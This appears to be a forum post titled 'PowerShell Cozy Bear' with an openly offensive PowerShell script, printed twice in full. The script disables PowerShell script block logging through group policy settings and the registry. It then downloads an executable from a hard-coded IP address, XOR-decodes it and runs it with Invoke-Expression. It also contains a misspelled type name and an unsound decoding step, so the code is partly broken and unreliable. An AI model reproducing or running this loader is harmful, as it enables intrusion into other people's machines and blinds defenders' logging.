PowerShell Cozy Bear
#Code By E1.Coders
if ($PSVersionTable.PSVersion.Major -ge 3) {
$utils = [System.Management.Automation.Utils]
$cachedGroupPolicySettings = $utils::GetFieldValue([System.Management.Automination.Utils], "cachedGroupPolicySettings")
if ($cachedGroupPolicySettings) {
if ($cachedGroupPolicySettings.ContainsKey("EnableScriptBlockLogging")) {
$cachedGroupPolicySettings["EnableScriptBlockLogging"] = 0
$cachedGroupPolicySettings["EnableScriptBlockInvocationLogging"] = 0
}
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell" -Name "ScriptBlockLogging" -Value $cachedGroupPolicySettings["EnableScriptBlockLogging"]
}
$userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
$payloadUrl = "http://46.246.38.234/malware.exe"
$payloadPath = "$env:TEMP\malware.exe"
Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath -UserAgent $userAgent
$key = 0x42
$payloadBytes = [System.IO.File]::ReadAllBytes($payloadPath)
$decryptedPayloadBytes = $payloadBytes | ForEach-Object { $_ -bxor $key }
$decryptedPayload = [System.Text.Encoding]::UTF8.GetString($decryptedPayloadBytes)
Invoke-Expression $decryptedPayload
} else {
Write-Host "PowerShell version 3 or later is required to run this script."
}
#Code By E1.Coders
if ($PSVersionTable.PSVersion.Major -ge 3) {
$utils = [System.Management.Automation.Utils]
$cachedGroupPolicySettings = $utils::GetFieldValue([System.Management.Automination.Utils], "cachedGroupPolicySettings")
if ($cachedGroupPolicySettings) {
if ($cachedGroupPolicySettings.ContainsKey("EnableScriptBlockLogging")) {
$cachedGroupPolicySettings["EnableScriptBlockLogging"] = 0
$cachedGroupPolicySettings["EnableScriptBlockInvocationLogging"] = 0
}
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell" -Name "ScriptBlockLogging" -Value $cachedGroupPolicySettings["EnableScriptBlockLogging"]
}
$userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
$payloadUrl = "http://46.246.38.234/malware.exe"
$payloadPath = "$env:TEMP\malware.exe"
Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath -UserAgent $userAgent
$key = 0x42
$payloadBytes = [System.IO.File]::ReadAllBytes($payloadPath)
$decryptedPayloadBytes = $payloadBytes | ForEach-Object { $_ -bxor $key }
$decryptedPayload = [System.Text.Encoding]::UTF8.GetString($decryptedPayloadBytes)
Invoke-Expression $decryptedPayload
} else {
Write-Host "PowerShell version 3 or later is required to run this script."
}
![[DK]](/data/avatars/s/57/57999.jpg?1720990206){kind=avatar}
